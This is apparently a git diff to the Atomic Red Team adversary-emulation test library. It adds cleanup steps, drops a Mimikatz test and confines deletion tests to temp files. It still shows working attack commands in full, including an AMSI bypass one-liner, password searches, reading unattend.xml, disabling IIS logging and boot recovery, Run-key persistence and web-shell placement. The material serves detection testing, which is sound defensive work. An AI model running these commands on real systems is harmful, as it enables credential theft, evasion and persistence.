diff --git a/atomics/T1081/T1081.md b/atomics/T1081/T1081.md
index 899d16be..ff357622 100644
--- a/atomics/T1081/T1081.md
+++ b/atomics/T1081/T1081.md
@@ -14,11 +14,9 @@ In cloud environments, authenticated user credentials are often stored in local
- [Atomic Test #2 - Extract passwords with grep](#atomic-test-2---extract-passwords-with-grep)
-- [Atomic Test #3 - Runs Mimikatz & Mimikittenz by name](#atomic-test-3---runs-mimikatz--mimikittenz-by-name)
+- [Atomic Test #3 - Extracting passwords with findstr](#atomic-test-3---extracting-passwords-with-findstr)
-- [Atomic Test #4 - Extracting passwords with findstr](#atomic-test-4---extracting-passwords-with-findstr)
-
-- [Atomic Test #5 - Access "unattend.xml"](#atomic-test-5---access-unattendxml)
+- [Atomic Test #4 - Access unattend.xml](#atomic-test-4---access-unattendxml)
@@ -60,24 +58,7 @@ grep -ri password #{file_path}
-## Atomic Test #3 - Runs Mimikatz & Mimikittenz by name
-Mimikatz/kittenz - This will require a Mimikatz executable or invoke-mimikittenz ps module.
-
-**Supported Platforms:** Windows
-
-
-#### Run it with `powershell`! Elevation Required (e.g. root or admin)
-```
-invoke-mimikittenz
-mimikatz.exe
-```
-
-
-
-
-
-
-## Atomic Test #4 - Extracting passwords with findstr
+## Atomic Test #3 - Extracting passwords with findstr
Extracting Credentials from Files
**Supported Platforms:** Windows
@@ -94,7 +75,7 @@ ls -R | select-string -Pattern password
-## Atomic Test #5 - Access "unattend.xml"
+## Atomic Test #4 - Access unattend.xml
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.
**Supported Platforms:** Windows
@@ -102,8 +83,8 @@ Attempts to access unattend.xml, where credentials are commonly stored, within t
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
```
-cmd /c type C:\Windows\Panther\unattend.xml > nul 2>&1
-cmd /c type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
+type C:\Windows\Panther\unattend.xml > nul 2>&1
+type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
```
diff --git a/atomics/T1086/T1086.md b/atomics/T1086/T1086.md
index fd20609f..d9cb62a0 100644
--- a/atomics/T1086/T1086.md
+++ b/atomics/T1086/T1086.md
@@ -122,7 +122,6 @@ $url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfilt
## Atomic Test #5 - Invoke-AppPathBypass
Note: Windows 10 only
-
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
**Supported Platforms:** Windows
diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md
index 5f387adb..7e5d3176 100644
--- a/atomics/T1089/T1089.md
+++ b/atomics/T1089/T1089.md
@@ -173,7 +173,7 @@ sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfig
## Atomic Test #8 - Unload Sysmon Filter Driver
-Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
+Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
**Supported Platforms:** Windows
@@ -204,7 +204,7 @@ sc start sysmon
## Atomic Test #9 - Disable Windows IIS HTTP Logging
-Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
+Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
This action requires HTTP logging configurations in IIS to be unlocked.
**Supported Platforms:** Windows
@@ -215,12 +215,20 @@ This action requires HTTP logging configurations in IIS to be unlocked.
|------|-------------|------|---------------|
| website_name | The name of the website on a server | string | Default Web Site|
-#### Run it with `command_prompt`!
+#### Run it with `powershell`!
```
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
```
+#### Commands to Check Prerequisites:
+```
+if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {0} else {1}
+```
+#### Cleanup Commands:
+```
+C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false
+```
@@ -250,7 +258,7 @@ sysmon -i -accepteula
## Atomic Test #11 - AMSI Bypass - AMSI InitFailed
-Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
+Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
**Supported Platforms:** Windows
@@ -272,7 +280,7 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
## Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
-This test removes the Windows Defender provider registry key.
+This test removes the Windows Defender provider registry key.
**Supported Platforms:** Windows
@@ -292,7 +300,7 @@ New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4
## Atomic Test #13 - Disable Arbitrary Security Windows Service
-With administrative rights, an adversary can disable Windows Services related to security products.
+With administrative rights, an adversary can disable Windows Services related to security products.
**Supported Platforms:** Windows
@@ -319,7 +327,7 @@ net.exe start #{service_name}
## Atomic Test #14 - Disable PowerShell Script Block Logging
-An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
+An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
Credit to Matt Graeber (@mattifestation) for the research.
@@ -347,7 +355,7 @@ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging']
## Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface
-An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
+An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
Credit to Matt Graeber (@mattifestation) for the research.
diff --git a/atomics/T1100/T1100.md b/atomics/T1100/T1100.md
index 1e1dac45..c0aabf18 100644
--- a/atomics/T1100/T1100.md
+++ b/atomics/T1100/T1100.md
@@ -31,5 +31,9 @@ xcopy #{web_shells} #{web_shell_path}
```
+#### Cleanup Commands:
+```
+del #{web_shell_path}
+```
diff --git a/atomics/T1107/T1107.md b/atomics/T1107/T1107.md
index ebb07c99..08cbbb25 100644
--- a/atomics/T1107/T1107.md
+++ b/atomics/T1107/T1107.md
@@ -104,14 +104,10 @@ Delete a single file from the temporary directory using cmd.exe
**Supported Platforms:** Windows
-#### Inputs
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| file_to_delete | Path of file to delete | Path | C:\Windows\Temp\victim-files-cmd\a|
-
#### Run it with `command_prompt`!
```
-del /f #{file_to_delete}
+echo "T1107" > %temp%\T1107.txt
+del /f %temp%\T1107.txt
```
@@ -125,14 +121,10 @@ Recursively delete the temporary directory and all files contained within it usi
**Supported Platforms:** Windows
-#### Inputs
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| folder_to_delete | Path of folder to delete | Path | C:\Windows\Temp\victim-files-cmd|
-
#### Run it with `command_prompt`!
```
-del /f /S #{folder_to_delete}
+mkdir %temp%\T1107
+rmdir /s /q %temp%\T1107
```
@@ -146,14 +138,10 @@ Delete a single file from the temporary directory using Powershell
**Supported Platforms:** Windows
-#### Inputs
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| file_to_delete | Path of file to delete | Path | C:\Windows\Temp\victim-files-ps\a|
-
#### Run it with `powershell`!
```
-Remove-Item -path "#{file_to_delete}"
+New-Item $env:TEMP\T1107.txt
+Remove-Item -path $env:TEMP\T1107.txt
```
@@ -174,7 +162,8 @@ Recursively delete the temporary directory and all files contained within it usi
#### Run it with `powershell`!
```
-Remove-Item -path "#{folder_to_delete}" -recurse
+New-Item $env:TEMP\T1107 -ItemType Directory
+Remove-Item -path $env:TEMP\T1107 -recurse
```
@@ -220,7 +209,7 @@ This test leverages `bcdedit` to remove boot-time recovery measures.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
+#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
```
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
@@ -232,7 +221,7 @@ bcdedit /set {default} recoveryenabled no
## Atomic Test #11 - wbadmin
-This test deletes Windows Backup catalogs.
+This test deletes Windows Backup catalogs.
**Supported Platforms:** Windows
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index 9acd2680..f7dc1c86 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -29,12 +29,16 @@ Modify the registry of the currently logged in user using reg.exe cia cmd consol
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
+#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
```
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
```
+#### Cleanup Commands:
+```
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f
+```
@@ -52,6 +56,10 @@ reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_
```
+#### Cleanup Commands:
+```
+reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f
+```
@@ -124,7 +132,7 @@ reg unload "HKU\$($ProfileList[$p].SID)"
## Atomic Test #4 - Modify registry to store logon credentials
-Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
+Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
**Supported Platforms:** Windows
diff --git a/atomics/index.md b/atomics/index.md
index 475276e9..c611b2af 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -661,9 +661,8 @@
- [T1081 Credentials in Files](./T1081/T1081.md)
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #2: Extract passwords with grep [macos, linux]
- - Atomic Test #3: Runs Mimikatz & Mimikittenz by name [windows]
- - Atomic Test #4: Extracting passwords with findstr [windows]
- - Atomic Test #5: Access "unattend.xml" [windows]
+ - Atomic Test #3: Extracting passwords with findstr [windows]
+ - Atomic Test #4: Access unattend.xml [windows]
- [T1214 Credentials in Registry](./T1214/T1214.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index c10604d4..ae6ffce7 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -4992,6 +4992,9 @@ persistence:
name: command_prompt
command: 'xcopy #{web_shells} #{web_shell_path}
+'
+ cleanup_command: 'del #{web_shell_path}
+
'
T1084:
technique:
@@ -7102,8 +7105,10 @@ defense-evasion:
'
- name: Unload Sysmon Filter Driver
- description: "Unloads the Sysinternals Sysmon filter driver without stopping
- the Sysmon service. \n"
+ description: 'Unloads the Sysinternals Sysmon filter driver without stopping
+ the Sysmon service.
+
+'
supported_platforms:
- windows
input_arguments:
@@ -7126,9 +7131,9 @@ defense-evasion:
fltmc.exe load #{sysmon_driver}
sc start sysmon
- name: Disable Windows IIS HTTP Logging
- description: "Disables HTTP logging on a Windows IIS web server as seen by Threat
- Group 3390 (Bronze Union). \nThis action requires HTTP logging configurations
- in IIS to be unlocked.\n"
+ description: |
+ Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
+ This action requires HTTP logging configurations in IIS to be unlocked.
supported_platforms:
- windows
input_arguments:
@@ -7137,10 +7142,18 @@ defense-evasion:
type: string
default: Default Web Site
executor:
- name: command_prompt
+ name: powershell
+ prereq_command: 'if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {0}
+ else {1}
+
+'
command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
/section:httplogging /dontLog:true
+'
+ cleanup_command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
+ /section:httplogging /dontLog:false
+
'
- name: Uninstall Sysmon
description: 'Uninstall Sysinternals Sysmon for Defense Evasion
@@ -7161,8 +7174,9 @@ defense-evasion:
'
- name: AMSI Bypass - AMSI InitFailed
- description: "Any easy way to bypass AMSI inspection is it patch the dll in
- memory setting the \"amsiInitFailed\" function to true. \nhttps://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\n"
+ description: |
+ Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
+ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
supported_platforms:
- windows
executor:
@@ -7171,9 +7185,9 @@ defense-evasion:
command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n"
cleanup_command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)\n"
- name: AMSI Bypass - Remove AMSI Provider Reg Key
- description: "With administrative rights, an adversary can remove the AMSI Provider
- registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection.\nThis
- test removes the Windows Defender provider registry key. \n"
+ description: |
+ With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
+ This test removes the Windows Defender provider registry key.
supported_platforms:
- windows
executor:
@@ -7188,8 +7202,10 @@ defense-evasion:
'
- name: Disable Arbitrary Security Windows Service
- description: "With administrative rights, an adversary can disable Windows Services
- related to security products. \n"
+ description: 'With administrative rights, an adversary can disable Windows Services
+ related to security products.
+
+'
supported_platforms:
- windows
input_arguments:
@@ -7207,8 +7223,10 @@ defense-evasion:
sc.exe config #{service_name} start= auto
net.exe start #{service_name}
- name: Disable PowerShell Script Block Logging
- description: "An adversary may disable PowerShell Script Block Logging to avoid
- leaving evidence. \n\nCredit to Matt Graeber (@mattifestation) for the research.\n"
+ description: |
+ An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
+
+ Credit to Matt Graeber (@mattifestation) for the research.
supported_platforms:
- windows
executor:
@@ -7225,14 +7243,18 @@ defense-evasion:
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
- name: PowerShell Bypass of AntiMalware Scripting Interface
- description: "An adversary may bypass Windows Defender AMSI to execute malicious
- PowerShell code. \n\nCredit to Matt Graeber (@mattifestation) for the research.\n"
+ description: |
+ An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
+
+ Credit to Matt Graeber (@mattifestation) for the research.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
- command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)'
+ command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)
+
+'
T1107:
technique:
x_mitre_data_sources:
@@ -7343,17 +7365,12 @@ defense-evasion:
'
supported_platforms:
- windows
- input_arguments:
- file_to_delete:
- description: Path of file to delete
- type: Path
- default: C:\Windows\Temp\victim-files-cmd\a
executor:
name: command_prompt
elevation_required: false
- command: 'del /f #{file_to_delete}
-
-'
+ command: |
+ echo "T1107" > %temp%\T1107.txt
+ del /f %temp%\T1107.txt
- name: Delete an entire folder - Windows cmd
description: 'Recursively delete the temporary directory and all files contained
within it using cmd.exe
@@ -7361,34 +7378,24 @@ defense-evasion:
'
supported_platforms:
- windows
- input_arguments:
- folder_to_delete:
- description: Path of folder to delete
- type: Path
- default: C:\Windows\Temp\victim-files-cmd
executor:
name: command_prompt
elevation_required: false
- command: 'del /f /S #{folder_to_delete}
-
-'
+ command: |
+ mkdir %temp%\T1107
+ rmdir /s /q %temp%\T1107
- name: Delete a single file - Windows PowerShell
description: 'Delete a single file from the temporary directory using Powershell
'
supported_platforms:
- windows
- input_arguments:
- file_to_delete:
- description: Path of file to delete
- type: Path
- default: C:\Windows\Temp\victim-files-ps\a
executor:
name: powershell
elevation_required: false
- command: 'Remove-Item -path "#{file_to_delete}"
-
-'
+ command: |
+ New-Item $env:TEMP\T1107.txt
+ Remove-Item -path $env:TEMP\T1107.txt
- name: Delete an entire folder - Windows PowerShell
description: 'Recursively delete the temporary directory and all files contained
within it using Powershell
@@ -7404,9 +7411,9 @@ defense-evasion:
executor:
name: powershell
elevation_required: false
- command: 'Remove-Item -path "#{folder_to_delete}" -recurse
-
-'
+ command: |
+ New-Item $env:TEMP\T1107 -ItemType Directory
+ Remove-Item -path $env:TEMP\T1107 -recurse
- name: Delete VSS - vssadmin
description: 'Delete all volume shadow copies with vssadmin.exe
@@ -7439,11 +7446,14 @@ defense-evasion:
- windows
executor:
name: command_prompt
+ elevation_required: true
command: |
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
- name: wbadmin
- description: "This test deletes Windows Backup catalogs. \n"
+ description: 'This test deletes Windows Backup catalogs.
+
+'
supported_platforms:
- windows
executor:
@@ -9488,10 +9498,14 @@ defense-evasion:
- windows
executor:
name: command_prompt
- elevation_required: false
+ elevation_required: true
command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
/t REG_DWORD /v HideFileExt /d 1 /f
+'
+ cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
+ /v HideFileExt /f
+
'
- name: Modify Registry of Local Machine - cmd
description: |
@@ -9505,6 +9519,10 @@ defense-evasion:
command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
/t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
+'
+ cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
+ /v SecurityHealth /f
+
'
- name: Modify Registry of Another User Profile
description: 'Modify a registry key of each user profile not currently loaded
@@ -9570,9 +9588,10 @@ defense-evasion:
[gc]::Collect()
reg unload "HKU\$($ProfileList[$p].SID)"
- name: Modify registry to store logon credentials
- description: "Sets registry key that will tell windows to store plaintext passwords
+ description: 'Sets registry key that will tell windows to store plaintext passwords
(making the system vulnerable to clear text / cleartext password dumping)
- \n"
+
+'
supported_platforms:
- windows
executor:
@@ -9616,7 +9635,9 @@ defense-evasion:
$EncodedCommand
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
cleanup_command: 'Remove-ItemProperty -Force -Path -Path #{registry_key_storage}
- -Name #{registry_entry_storage}'
+ -Name #{registry_entry_storage}
+
+'
T1170:
technique:
x_mitre_data_sources:
@@ -14943,6 +14964,9 @@ privilege-escalation:
name: command_prompt
command: 'xcopy #{web_shells} #{web_shell_path}
+'
+ cleanup_command: 'del #{web_shell_path}
+
'
impact:
T1531:
@@ -19261,19 +19285,6 @@ credential-access:
command: 'grep -ri password #{file_path}
'
- - name: Runs Mimikatz & Mimikittenz by name
- description: 'Mimikatz/kittenz - This will require a Mimikatz executable or
- invoke-mimikittenz ps module.
-
-'
- supported_platforms:
- - windows
- executor:
- name: powershell
- elevation_required: true
- command: |
- invoke-mimikittenz
- mimikatz.exe
- name: Extracting passwords with findstr
description: 'Extracting Credentials from Files
@@ -19286,7 +19297,7 @@ credential-access:
command: |
findstr /si pass *.xml | *.doc | *.txt | *.xls
ls -R | select-string -Pattern password
- - name: Access "unattend.xml"
+ - name: Access unattend.xml
description: 'Attempts to access unattend.xml, where credentials are commonly
stored, within the Panther directory where installation logs are stored.
@@ -19297,8 +19308,8 @@ credential-access:
name: command_prompt
elevation_required: true
command: |
- cmd /c type C:\Windows\Panther\unattend.xml > nul 2>&1
- cmd /c type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
+ type C:\Windows\Panther\unattend.xml > nul 2>&1
+ type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
T1214:
technique:
x_mitre_permissions_required:
@@ -21416,7 +21427,6 @@ execution:
- name: Invoke-AppPathBypass
description: |
Note: Windows 10 only
-
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
supported_platforms:
- windows
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 2dc25b92..5cc9a9eb 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -473,9 +473,8 @@
- Atomic Test #12: GPP Passwords (Get-GPPPassword) [windows]
- T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1081 Credentials in Files](./T1081/T1081.md)
- - Atomic Test #3: Runs Mimikatz & Mimikittenz by name [windows]
- - Atomic Test #4: Extracting passwords with findstr [windows]
- - Atomic Test #5: Access "unattend.xml" [windows]
+ - Atomic Test #3: Extracting passwords with findstr [windows]
+ - Atomic Test #4: Access unattend.xml [windows]
- [T1214 Credentials in Registry](./T1214/T1214.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)